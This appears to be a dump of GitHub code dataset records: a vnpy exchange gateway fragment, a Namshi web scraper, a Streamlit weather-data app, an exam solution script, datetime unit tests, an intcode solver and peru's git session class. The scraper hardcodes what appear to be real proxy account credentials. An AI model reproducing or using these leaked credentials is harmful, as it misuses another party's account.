tick.bidPrice1 = bids[0]\n tick.bidPrice2 = bids[2]\n tick.bidPrice3 = bids[4]\n tick.bidPrice4 = bids[6]\n tick.bidPrice5 = bids[8]\n \n tick.askPrice1 = asks[0]\n tick.askPrice2 = asks[2]\n tick.askPrice3 = asks[4]\n tick.askPrice4 = asks[6]\n tick.askPrice5 = asks[8] \n \n tick.bidVolume1 = bids[1]\n tick.bidVolume2 = bids[3]\n tick.bidVolume3 = bids[5]\n tick.bidVolume4 = bids[7]\n tick.bidVolume5 = bids[9]\n \n tick.askVolume1 = asks[1]\n tick.askVolume2 = asks[3]\n tick.askVolume3 = asks[5]\n tick.askVolume4 = asks[7]\n tick.askVolume5 = asks[9] \n \n tick.datetime = datetime.fromtimestamp(d['ts']/1000)\n tick.date = tick.datetime.strftime('%Y%m%d')\n tick.time = tick.datetime.strftime('%H:%M:%S')\n \n if tick.lastPrice:\n self.gateway.onTick(copy(tick)) \n\n\n#----------------------------------------------------------------------\ndef printDict(d):\n \"\"\"\"\"\"\n print('-' * 30)\n l = d.keys()\n l.sort()\n for k in l:\n print(k, d[k])\n ","repo_name":"rjj510/vnpy","sub_path":"vnpy_system/vnpy/trader/gateway/fcoinGateway/fcoinGateway.py","file_name":"fcoinGateway.py","file_ext":"py","file_size_in_byte":19811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"13111577158","text":"from openpyxl import load_workbook\nimport requests\nfrom bs4 import BeautifulSoup\nimport xlsxwriter\ncatdata=[]\ncaturl = []\ncatcount =[]\n\nproxy_support ={'https': 'https://11115:7My2Ng@world.nohodo.com:6811'}\n#===========code to iterate through the excel file=============================\n\nworkbook = xlsxwriter.Workbook('E:\\\\Namshi.xlsx')\nworksheet = workbook.add_worksheet()\nworksheet.write('A1','URL','bold')\nworksheet.write('B1','Name','bold')\nworksheet.write('C1','Count','bold')\nrow = 1\ncol = 0\n\n\nfile = open(\"E:\\\\Namshi.text\",'w+')\nurl = \"https://en-ae.namshi.com/\"\nrs= requests.get(url,proxies=proxy_support)\nsoup = BeautifulSoup(rs.text, \"lxml\")\ncatLink = soup.find_all(\"li\",{\"data-nm-hover-toggle\": \"data-nm-hover-toggle\"})\nfor cat in catLink:\n liList = cat.find_all(\"ul\",{\"class\": \"level_02\"})\n for li in liList:\n aTag = li.find(\"a\")\n CatName = aTag.text\n# file.write(CatName +\"{\")\n worksheet.write(row,1,CatName)\n CatUrl = \"https://en-ae.namshi.com\" + aTag[\"href\"]\n# worksheet.write(row,1,CatUrl)\n caturl.append(CatUrl)\n row += 1\n \nfor url in caturl:\n worksheet.write(row,0,url)\n file.write(url +\"{\")\n rss= requests.get(url,proxies=proxy_support)\n soup = BeautifulSoup(rss.text, \"lxml\")\n count = soup.find(\"p\",{\"class\": \"items\"})\n print(url)\n print(count)\n if count != []:\n cnt = count.text\n \n file.write(cnt +\"{\")\n worksheet.write(row,2,cnt)\n catcount.append(cnt)\n file.write(\"|\")\n \n# =============================================================================\n# for data , url , cnt from zip(catdata, caturl,catcount):\n# file.write(data, \"!+\", url, \"!+\", cnt)\n# file.close()\n# =============================================================================\n\nfile.close()\nworkbook.close()","repo_name":"hemantkhadye/Hemant-Python","sub_path":"TestURLCount.py","file_name":"TestURLCount.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40572149035","text":"import streamlit as st\nimport pandas as pd\n#import plotly.express as px\nimport numpy as np\nimport glob\nimport os\n#import matplotlib.pyplot as plt\n\n##=================================\n###Datuak lortu\n##=================================\n\n#f_csv='../Denak_batera.csv' #Ubunturako\nf_csv='./Denak_batera.csv' #Github-erako\n\n@st.cache\ndef load_data(path):\n dataset = pd.read_csv(path, sep='\\t')\n return dataset\n\ndf_all = load_data(f_csv)\n\n#################################\n#Sidebar\n#=================================\nwith st.sidebar:\n st.subheader('Dades Meteorològiques')\n st.markdown('Jon Mujika')\n \nst.sidebar.image('star-4167939__480.jpg', width=250)\n\n#==================================\n\nst.header('# Dades Meteorològiques')\nst.markdown('''\nDades obtingudes des de: \n[Meteoprades](https://www.meteoprades.net) : Vilaplana, La-Mussara, Alforja, l\\'Aleixar, l'Albiol \n[AEMET](https://www.meteoprades.net/): Donosti, Bilbo, Gasteiz, Iruña, Alforja, Reus, Tarragona, Vigo \n \nNota 1: fixeu-vos que en el cas d'Alforja hi ha dades de les dues fonts. Com diferenciar-les: \n$\\cdot$ Dades de Meteoprades: alforja (tot en minúscula) \n$\\cdot$ Dades d\\'AEMET: Alforja (primera lletra en majúscula) \n\nNota 2: Periode de les dades: \n$\\cdot$ Dades de Meteoprades: a partir de 2019 \n$\\cdot$ Dades d\\'AEMET: a partir de 2013 \n''')\n\n##=================================\n##Euriaren kalkuluak\n##=================================\n\n#Dataframe berri bat euri-egunekin bakarrik (>1 litro)\neuridunak= df_all[df_all['Euria'] > 1]\n\n#Taldeak egin: Tokia eta urteko\neuria_urteko=euridunak.sort_values(['Tokia','Urtea'],ascending=True).groupby(['Tokia','Urtea'], sort = False).sum()['Euria']\n\n#Euri-egunak zenbatu toki eta urteko bakoitzerko\n#Zutabe guztietan kalkulatzen du, baina nik behin behar det. Fetxa zutabera-ko datua gordeko dut, behin bakarrik edukitzeko\neuri_egunak=euridunak.sort_values(['Tokia','Urtea'],ascending=True).groupby(['Tokia','Urtea']).agg(np.size)['Eguna']\n\n##=================================\n## Taula 0: Datu guztiak modu askotara\n##=================================\n\nst.header('## Taula per filtrar totes les dades')\nst.markdown('''\n\t \n\tMenú 'Paràmetre': tria el paràmetre. Les opecions són: \n\t\t\t$\\cdot$ Tmax: Temperatura màxima d'un dia \n\t\t\t$\\cdot$ Tmin: Temperatura mínima d'un dia \n\t\t\t$\\cdot$ Euria: Pluja d'un dia \n\t\t\t$\\cdot$ Vmax: Velocitat màxima del vent d'un dia \n\tMenú 'Municipi': tria el municipi. Hi ha l\\'opció de triar tots els municipis. \n\tMenú 'Any': tria l'any. Hi ha l'opció de tots els anys. \n\tMenú 'Mes': tria el mes. Hi ha l'opció de tots els messos. \n\tMenú 'Nombre de dades': tria quantes dades apareixeran a la taula. \n\tIMPORTANT: per que s'actualitzi la taula, pren el botó 'Envia selecció'. \n\t''') \n\nwith st.form('Taula0'):\n\n\tselected_zer0 = st.selectbox(label='Paràmetre', options=['Tmax','Tmin','Euria','Vmax'])\n\tselected_toki0 = st.selectbox(label='Municipi', options=['Tots', 'vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\tselected_urte0 = st.selectbox(label='Any', options=['Tots',2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tselected_hilab0 = st.selectbox(label='Mes', options=['Tots', 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n\tselected_zenbat0= st.selectbox(label='Nombre de dades', options=[5,10,20,30,50])\n\tsubmitted0 = st.form_submit_button('Envia selecció')\n\n\tif submitted0:\n\n \t#Aurrena, filtratu toki konkretu baterako\n\t\tif (selected_toki0 =='Tots'):\n\t\t\tfilt_1 = df_all\n\t\telse:\n\t\t\tfilt_1 = df_all[df_all['Tokia'] == selected_toki0]\n\t\t#Orain, urte baterako\n\t\tif (selected_urte0 =='Tots'):\n\t\t\tfilt_2 = filt_1 \n\t\telse:\n\t\t\tfilt_2 = filt_1[filt_1['Urtea'] == selected_urte0]\n\t\t#Azkenik, hilabeteka\n\t\tif (selected_hilab0 =='Tots'):\n\t\t\tfilt_3 = filt_2 \n\t\telse:\n\t\t\tfilt_3 = filt_2[filt_2['Hilab'] == selected_hilab0]\n\n\n\t\tif (selected_zer0=='Tmin'):\n\t\t\t\tdata_all=filt_3.sort_values(by=selected_zer0,ascending=True)\n\t\telse:\n\t\t\t\tdata_all=filt_3.sort_values(by=selected_zer0,ascending=False)\n \n\t\tdf_table=data_all[['Tokia','Eguna','Hilab','Urtea',selected_zer0]][:selected_zenbat0]\n\t\t#st.table(df_table)\n\t\tst.table(df_table.style.format({selected_zer0: '{:.1f}'}))\n\n\n##=================================\n## Taula 2: Euriaren datuak urteka\n##=================================\n\nst.header('## Taula amb dades de pluja anuals per un municipi')\nst.markdown('''\n\tPrimer menú, tria el municipi. \n\tTot seguit, pren el botó de sota\n\t''') \n\nwith st.form('Taula6'):\n\n\tselected_toki6 = st.selectbox(label='Municipi', options=['vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\tsubmitted6 = st.form_submit_button('Envia selecció')\n\n\tif submitted6:\n\n\t\tfiltered_ta6 = df_all[df_all['Tokia'] == selected_toki6]\n\n\t\tdatuak_ta6=filtered_ta6.sort_values(['Urtea'],ascending=True).groupby(['Urtea'], sort = False).sum()['Euria'] \n\t#datuak_ta6.reset_index(inplace = True)\n \n\t#df_table6=datuak_ta6[['Tokia','Urtea','Euria']][:selected_zenbat]\n\t#st.dataframe(df_table6)\n\t\tst.table(datuak_ta6.map('{:.1f}'.format))#.style.format(\"{:.1f}\"))\n\n##=================================\n## Taula 3: Euriaren datuak hilabeteka\n##=================================\n\nst.header('## Taula amb dades de pluja mensuals per any i per municipi')\nst.markdown('''\n\tPrimer menú, tria el municipi. \n\tSegon menú, tria un any. \n\tPer últim, pren el botó de sota\n\t''') \n\nwith st.form('Taula7'):\n\n\tselected_toki7 = st.selectbox(label='Municipi', options=['vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\t#selected_urte7a = st.selectbox(label='Any 1', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\t#selected_urte7b = st.selectbox(label='Any 2', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tsubmitted7 = st.form_submit_button('Envia selecció')\n\n\tif submitted7:\n\n\t\ttmp_tokia7 = df_all[df_all['Tokia'] == selected_toki7]\n\n\t\tif (selected_toki7=='vilaplana' or selected_toki7=='la-mussara' or selected_toki7=='laleixar' or \n\t\t\tselected_toki7=='lalbiol' or selected_toki7=='alforja'):\n\t\t\t\n\t\t\tfiltered_2023 = tmp_tokia7[tmp_tokia7['Urtea'] == 2023]\n\t\t\tfiltered_2022 = tmp_tokia7[tmp_tokia7['Urtea'] == 2022]\n\t\t\tfiltered_2021 = tmp_tokia7[tmp_tokia7['Urtea'] == 2021]\n\t\t\tfiltered_2020 = tmp_tokia7[tmp_tokia7['Urtea'] == 2020]\n\t\t\tfiltered_2019 = tmp_tokia7[tmp_tokia7['Urtea'] == 2019]\n\t\t\t\n\t\t\tdatuak_2023=filtered_2023.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2022=filtered_2022.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2021=filtered_2021.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2020=filtered_2020.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2019=filtered_2019.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\n\t\t\tbatera = pd.concat([datuak_2023,datuak_2022,datuak_2021,datuak_2020,datuak_2019], ignore_index=True, axis=1)\n\t\t\tbatera=batera.rename(columns = {0:'2023',1:'2022',2:'2021',3:'2020',4:'2019'})\n\t\telse:\n\t\t\tfiltered_2023 = tmp_tokia7[tmp_tokia7['Urtea'] == 2023]\n\t\t\tfiltered_2022 = tmp_tokia7[tmp_tokia7['Urtea'] == 2022]\n\t\t\tfiltered_2021 = tmp_tokia7[tmp_tokia7['Urtea'] == 2021]\n\t\t\tfiltered_2020 = tmp_tokia7[tmp_tokia7['Urtea'] == 2020]\n\t\t\tfiltered_2019 = tmp_tokia7[tmp_tokia7['Urtea'] == 2019]\n\t\t\tfiltered_2018 = tmp_tokia7[tmp_tokia7['Urtea'] == 2018]\n\t\t\tfiltered_2017 = tmp_tokia7[tmp_tokia7['Urtea'] == 2017]\n\t\t\tfiltered_2016 = tmp_tokia7[tmp_tokia7['Urtea'] == 2016]\n\t\t\tfiltered_2015 = tmp_tokia7[tmp_tokia7['Urtea'] == 2015]\n\t\t\tfiltered_2014 = tmp_tokia7[tmp_tokia7['Urtea'] == 2014]\n\t\t\tfiltered_2013 = tmp_tokia7[tmp_tokia7['Urtea'] == 2013]\n\t\t\t\n\t\t\tdatuak_2023=filtered_2023.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2022=filtered_2022.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2021=filtered_2021.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2020=filtered_2020.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2019=filtered_2019.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2018=filtered_2018.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2017=filtered_2017.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2016=filtered_2016.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2015=filtered_2015.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2014=filtered_2014.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2013=filtered_2013.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\n\t\t\tbatera = pd.concat([datuak_2023,datuak_2022,datuak_2021,datuak_2020,datuak_2019,datuak_2018,datuak_2017,datuak_2016,\n\t\t\t\tdatuak_2015,datuak_2014,datuak_2013], ignore_index=True, axis=1)\n\t\t\tbatera=batera.rename(columns = {0:'2023',1:'2022',2:'2021',3:'2020',4:'2019',5:'2018',6:'2017',7:'2016',8:'2015',9:'2014',10:'2013'})\n\n\t\t\n\t\t#st.dataframe(datuak_ta7)\n\t\tst.table(batera.style.format(\"{:.1f}\"))\n\n##=================================\n## Grafika 1: Leku baterako, euria urteka\n##=================================\n\nst.header('## Gràfica 1: Pluja anual a cada municipi')\nst.markdown('Primer, amb el menú, tria el municipi') \nst.markdown('Despres, pren el botó de sota') \n\n\nwith st.form('Grafika1'):\n\n\tselected_toki1 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\tsubmitted1 = st.form_submit_button('Envia selecció')\n\n\tif submitted1:\n\t\tfiltered_tokia1 = df_all[df_all['Tokia'] == selected_toki1]\n\t\tdatuak_gr1=filtered_tokia1.sort_values(['Urtea'],ascending=True).groupby(['Urtea'], sort = False).sum()['Euria'] \n\t\tchart_data1 = datuak_gr1\n\t\tst.bar_chart(chart_data1)\n\n##=================================\n## Grafika 2: Leku baterako eta urte baterako, euria hilabeteka\n##=================================\n\nst.header('## Gràfica 2: Pluja mensual per any i per municipi')\nst.markdown('Primer, amb el menú, tria el municipi') \nst.markdown('Segon, amb el altre menú, tria l\\'any') \nst.markdown('Finalment, pren el botó de sota') \n\nwith st.form('Grafika2'):\n\n\tselected_toki2 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\t#selected_urte2 = st.selectbox(label='Any', options=df_all['Urtea'].unique())\n\t#Goiko aukerarekin, urteak desordenatuta daude. Eskuz jarriko ditut\n\tselected_urte2 = st.selectbox(label='Any', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tsubmitted2 = st.form_submit_button('Envia selecció')\n\n\tif submitted2:\n\t\t\n\n\t\ttmp_tokia2 = df_all[df_all['Tokia'] == selected_toki2]\n\t\tfiltered_2 = tmp_tokia2[tmp_tokia2['Urtea'] == selected_urte2]\n\t\tdatuak_gr2=filtered_2.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria'] \n\t\tchart_data2 = datuak_gr2\n\t\tif (selected_urte2<2019 and (selected_toki2=='vilaplana' or selected_toki2=='la-mussara' or \n\t\t\tselected_toki2=='lalbiol' or selected_toki2=='laleixar' or selected_toki2=='alforja')):\n\t\t\tst.markdown(\"Per aquest municipi, dades disponibles a partir de l'any 2019\")\n\t\telse:\n\t\t\tst.bar_chart(chart_data2)\n\n##=================================\n## Grafika 3: Leku baterako, bi urteko euria konparatu hilabeteka\n##=================================\n#Ez det lortu\n\n##=================================\n## Grafika 4: Leku baterako eta urte baterako, haize-egunak hilabetero\n##=================================\n\nst.header('## Gràfica 3: Dies de vent anual a cada municipi')\nst.markdown('Per a un municipi, quans dies de vent hi van haver-hi.') \nst.markdown('Es pot triar la velocitat mínima del vent') \n\n\nwith st.form('Grafika4'):\n\n\tselected_toki4 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\tselected_vel = st.slider('Velocitat mínima del vent', 0, 100, 10)\n\tsubmitted4 = st.form_submit_button('Envia selecció')\n\n\tif submitted4:\n\t\ttmp_tokia4 = df_all[df_all['Tokia'] == selected_toki4]\n\t\tfiltered_gr4 = tmp_tokia4[tmp_tokia4['Vmax'] > selected_vel]\n\t\tdatuak_gr4=filtered_gr4.sort_values(['Urtea'],ascending=True).groupby(['Urtea']).agg(np.size)['Vmax']\n\t\t\n\t\tchart_data4 = datuak_gr4\n\t\t#st.write(datuak_gr4)\n\t\tst.bar_chart(chart_data4)\n\n\n","repo_name":"niregauzak/Eguraldia_Streamlit","sub_path":"eguraldia_str.py","file_name":"eguraldia_str.py","file_ext":"py","file_size_in_byte":12773,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4270841140","text":"def parse(name):\n tab = open(f'dane/{name}.txt', 'r').read().split('\\n')[:-1]\n tab = [ dict(zip(tab[0].split('\\t'), i.split('\\t'))) for i in tab[1:]]\n globals()[name] = tab\n\nparse('klienci')\nparse('agenci')\nparse('oferta')\nparse('zainteresowanie')\n\n#6.1\nimiona = {i['Id_agenta'] : f\"{i['Imie']} {i['Nazwisko']}\" for i in agenci}\nag = {i['Id_oferty'] : i['Id_agenta'] for i in oferta}\n\nfrom collections import defaultdict as dd\nans = dd(lambda:0)\nfor i in zainteresowanie:\n ind = i['Id_oferty']\n ans[ind] += 1\nans = sorted(ans.items(), key=lambda x:x[1])[-1]\nprint(imiona[ag[ans[0]]], ans[0])\n\n#6.2\nprint()\nans = dd(lambda:[0,0])\nw = set()\nfor i in oferta:\n c = int(i['Cena'])\n ind= i['Woj ']\n ans[ind][0] += c\n ans[ind][1] += 1\n w.add(ind)\nw = list(w)\nw.sort()\nfor i in w:\n print(i, round(ans[i][0]/ans[i][1],2))\n\n#6.3\nprint()\n\nfor i in oferta:\n bas = i['Id_oferty'].strip()[-2:] == 'MT'\n st = i['Status'].strip() == 'A'\n if not bas or not st: continue\n\n ind = i['Id_oferty']\n name = imiona[ag[ind]]\n print(ind, name, i['Woj '], i['Pow'], i['Cena'])\n\n#6.4\nprint()\n\ntab = set()\nfor i in oferta:\n y = i['Data_zglosz'].split('-')[0] == '2017'\n st = i['Status'].strip() == 'S'\n if not y or not st: continue\n\n tab.add(i['Id_agenta'])\n\nfor i in agenci:\n if i['Id_agenta'] in tab: continue\n print(imiona[i['Id_agenta']])\n\n#6.5\nprint()\n\nfor i in oferta:\n st = i['Status'].strip() == 'A'\n ok = int(i['Pow']) > 180 and st and int(i['L_laz']) >= 2\n if not ok: continue\n\n ind = i['Id_oferty']\n p = int(i['L_pokoi'])\n l = int(i['L_laz'])\n print(ind, i['Pow'], p, l, i['Cena'], imiona[ag[ind]])\n\n\n","repo_name":"mcnuggetsx20/high-school-coding","sub_path":"matura/2019_czerwiec/z6.py","file_name":"z6.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16792691609","text":"import unittest\nfrom datetime import datetime\n\nfrom ddt import data, ddt, unpack\nfrom truth.truth import AssertThat\n\nfrom mycalendar.lib.datetime_helper import DateTimeHelper\n\n\n@ddt\nclass DateTimeHelperTest(unittest.TestCase):\n def setUp(self):\n super().setUp()\n self.date_time_helper = DateTimeHelper()\n\n def test_calculate_days_of_week_calculates_weekdays_correctly(self):\n now = datetime.now().isocalendar()\n\n days_of_week = self.date_time_helper.calculate_days_of_week(\n now[0], now[1]\n )\n\n for i in range(1, 8):\n AssertThat(days_of_week[i - 1][\"date\"]).IsEqualTo(\n datetime.fromisocalendar(now[0], now[1], i)\n .date()\n .strftime(\"(%b. %-d)\")\n )\n AssertThat(days_of_week[i - 1][\"name\"]).IsEqualTo(\n datetime.fromisocalendar(now[0], now[1], i)\n .date()\n .strftime(\"%a\")\n )\n\n @data(\n (2020, -1, 2019, 52),\n (2020, 0, 2019, 52),\n (2020, 52, 2020, 52),\n (2020, 53, 2020, 53),\n (2020, 54, 2021, 1),\n (2021, -1, 2020, 53),\n (2021, 0, 2020, 53),\n (2021, 52, 2021, 52),\n (2021, 53, 2022, 1),\n (2021, 54, 2022, 1),\n (\n datetime.now().isocalendar()[0],\n datetime.now().isocalendar()[1],\n datetime.now().isocalendar()[0],\n datetime.now().isocalendar()[1],\n ),\n )\n @unpack\n def test_calculate_different_year_handles_anniversaries_correctly(\n self, year, week, expected_year, expected_week\n ):\n (\n calculated_year,\n calculated_week,\n ) = self.date_time_helper.calculate_different_year(year, week)\n\n AssertThat(calculated_year).IsEqualTo(expected_year)\n AssertThat(calculated_week).IsEqualTo(expected_week)\n\n @data(\n (\"0\", \"00:00:00\"),\n (\"1\", \"01:00:00\"),\n (\"2\", \"02:00:00\"),\n (\"3\", \"03:00:00\"),\n (\"4\", \"04:00:00\"),\n (\"5\", \"05:00:00\"),\n (\"6\", \"06:00:00\"),\n (\"7\", \"07:00:00\"),\n (\"8\", \"08:00:00\"),\n (\"9\", \"09:00:00\"),\n (\"10\", \"10:00:00\"),\n (\"11\", \"11:00:00\"),\n (\"12\", \"12:00:00\"),\n (\"13\", \"13:00:00\"),\n (\"14\", \"14:00:00\"),\n (\"15\", \"15:00:00\"),\n (\"16\", \"16:00:00\"),\n (\"17\", \"17:00:00\"),\n (\"18\", \"18:00:00\"),\n (\"19\", \"19:00:00\"),\n (\"20\", \"20:00:00\"),\n (\"21\", \"21:00:00\"),\n (\"22\", \"22:00:00\"),\n (\"23\", \"23:00:00\"),\n (\"24\", \"00:00:00\"),\n )\n @unpack\n def test_hour_number_to_24_hours_format_transforms_correctly(\n self, hour, expected_hour\n ):\n calculated_hour = self.date_time_helper.hour_number_to_24_hours_format(\n hour\n )\n\n AssertThat(calculated_hour).IsEqualTo(expected_hour)\n","repo_name":"kovrichard/mycalendar","sub_path":"tests/lib/datetime_helper_test.py","file_name":"datetime_helper_test.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33811546885","text":"import sys # argv\n\nfrom intcode import load_memory, run_program\n\nclass Camera:\n def __init__(self):\n self.grid = {}\n self.x = 0\n self.y = 0\n self.width = 0\n self.height = 0\n \n def input_func(self) -> int:\n raise NotImplementedError()\n \n def output_func(self, value: int):\n char = chr(value)\n if char == '\\n':\n self.x = 0\n self.y += 1\n else:\n self.grid[(self.x,self.y)] = {\n '.': False, '#': True,\n '^': True, 'V': True, '<': True, '>': True,\n 'X': False,\n }[char]\n self.width = max(self.width, self.x+1)\n self.height = max(self.height, self.y+1)\n self.x += 1\n \n def print_grid(self):\n for y in range(self.height):\n for x in range(self.width):\n char = '#' if self.grid[(x, y)] else '.'\n print(char, end='')\n print()\n\n# run the program to get the grid\ncamera = Camera()\nmemory = load_memory(sys.argv[1])\nrun_program(memory, camera.input_func, camera.output_func)\n\n# compute the sum of the \"alignment parameters\"\nalign_param_sum = 0\nfor x in range(1, camera.width-1):\n for y in range(1, camera.height-1):\n if all(camera.grid[pos] for pos in [(x,y),(x+1,y),(x-1,y),(x,y+1),(x,y-1)]):\n align_param_sum += x * y\nprint(align_param_sum)\n","repo_name":"qxzcode/aoc_2019","sub_path":"17/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36237415706","text":"import asyncio\nimport contextlib\nimport collections\nimport hashlib\nimport json\nimport os\nimport pathlib\nimport re\nimport textwrap\n\nfrom .async_helpers import safe_communicate\nfrom .compat import makedirs\nfrom .error import PrintableError\nfrom .keyval import KeyVal\n\n# git output modes\nTEXT_MODE = object()\nBINARY_MODE = object()\n\n# for tests\nDEBUG_GIT_COMMAND_COUNT = 0\n\n\ndef compute_key(data):\n # To hash this dictionary of fields, serialize it as a JSON string, and\n # take the SHA1 of that string. Dictionary key order is unspecified, so\n # \"sort_keys\" keeps our hash stable. Specifying separators makes the\n # JSON slightly more compact, and protects us against changes in the\n # default. \"ensure_ascii\" defaults to true, so specifying it just\n # protects us from changes in the default.\n json_representation = json.dumps(\n data, sort_keys=True, ensure_ascii=True, separators=(',', ':'))\n sha1 = hashlib.sha1()\n sha1.update(json_representation.encode(\"utf8\"))\n return sha1.hexdigest()\n\n\nclass GitSession:\n '''All of our git operations will share the same repo, but we don't want\n them to share the same index file. That's for two reasons:\n 1) We want to be able to run multiple operations in parallel that write\n to the index file.\n 2) We want to be able to save the index file corresponding to the last\n imports, and guarantee that nothing will touch it.\n A git session owns the index file it does operations on. We also use this\n class to abstract away the low level details of git command flags. (And in\n the future, this could be where we plug in libgit2.)'''\n\n def __init__(self, git_dir, index_file, working_copy):\n self.git_dir = git_dir\n self.index_file = index_file\n self.working_copy = working_copy\n\n async def git(self, *args, input=None, output_mode=TEXT_MODE, cwd=None):\n global DEBUG_GIT_COMMAND_COUNT\n DEBUG_GIT_COMMAND_COUNT += 1\n command = ['git']\n command.append('--git-dir=' + self.git_dir)\n if self.working_copy:\n command.append(\"--work-tree=\" + self.working_copy)\n command.extend(args)\n if isinstance(input, str):\n input = input.encode()\n process = await asyncio.subprocess.create_subprocess_exec(\n *command,\n cwd=cwd,\n env=self.git_env(),\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await safe_communicate(process, input)\n stderr = stderr.decode()\n if output_mode == TEXT_MODE:\n stdout = stdout.decode()\n stdout = stdout.rstrip()\n if process.returncode != 0:\n raise GitError(command, process.returncode, stdout, stderr)\n return stdout\n\n def git_env(self):\n 'Set the index file and prevent git from reading global configs.'\n env = dict(os.environ)\n for var in [\"HOME\", \"XDG_CONFIG_HOME\"]:\n env.pop(var, None)\n env[\"GIT_CONFIG_NOSYSTEM\"] = \"true\"\n # Weirdly, GIT_INDEX_FILE is interpreted relative to the work tree. As\n # a workaround, we absoluteify the path.\n env[\"GIT_INDEX_FILE\"] = os.path.abspath(self.index_file)\n return env\n\n async def init_git_dir(self):\n await self.git('init', '--bare')\n\n async def read_tree_into_index(self, tree):\n await self.git('read-tree', tree)\n\n async def read_tree_and_stats_into_index(self, tree):\n await self.read_tree_into_index(tree)\n # Refresh all the stat() information in the index.\n try:\n # This throws an error on modified files. Suppress it.\n await self.git('update-index', '--refresh')\n except GitError as e:\n if 'needs update' not in e.stdout:\n # Reraise any errors we don't recognize.\n raise\n\n async def make_tree_from_index(self):\n tree = await self.git('write-tree')\n return tree\n\n async def read_working_copy_into_index(self, picks):\n # Use --force to avoid .gitignore rules. We shouldn't respect them.\n if picks:\n # As in list_tree_entries, prepend ./ to avoid interpreting leading\n # colons in pathspecs.\n picks = [\"./\" + pick for pick in picks]\n await self.git('add', '--force', '--', *picks)\n else:\n await self.git('add', '--all', '--force')\n\n async def drop_paths_from_index(self, paths):\n if not paths:\n return\n # As in list_tree_entries, prepend ./ to avoid interpreting leading\n # colons in pathspecs.\n paths = [\"./\" + path for path in paths]\n ls_output = await self.git(\n 'ls-files', '--full-name', '-z', *paths, output_mode=BINARY_MODE)\n await self.git(\n 'update-index', '--force-remove', '-z', '--stdin', input=ls_output)\n\n async def merge_tree_into_index(self, tree, prefix):\n # The --prefix argument to read-tree chokes on paths that contain dot\n # or dot-dot. Instead of './', it wants the empty string. Oblige it.\n # NOTE: This parameter must be forward-slash-separated, even on\n # Windows. os.path.normpath() is not correct here!\n prefix_path = pathlib.PurePosixPath(prefix)\n assert '..' not in prefix_path.parts\n prefix_arg = prefix_path.as_posix()\n prefix_arg = '' if prefix_arg == '.' else prefix_arg\n # Normally read-tree with --prefix wants to make sure changes don't\n # stomp on the working copy. The -i flag ignores the working copy.\n await self.git('read-tree', '-i', '--prefix', prefix_arg, tree)\n\n async def working_copy_matches_index(self):\n diff_output = await self.git('diff-files', output_mode=BINARY_MODE)\n return len(diff_output) == 0\n\n async def get_modified_files_skipping_deletes(self):\n # We want to ignore deleted files, so we exclude only deletes using\n # 'd' instead of including all of the capital letter forms.\n # https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203\n diff_output = await self.git('diff-files', '-z', '--name-only',\n '--diff-filter=d')\n return [name for name in diff_output.split('\\x00') if name]\n\n 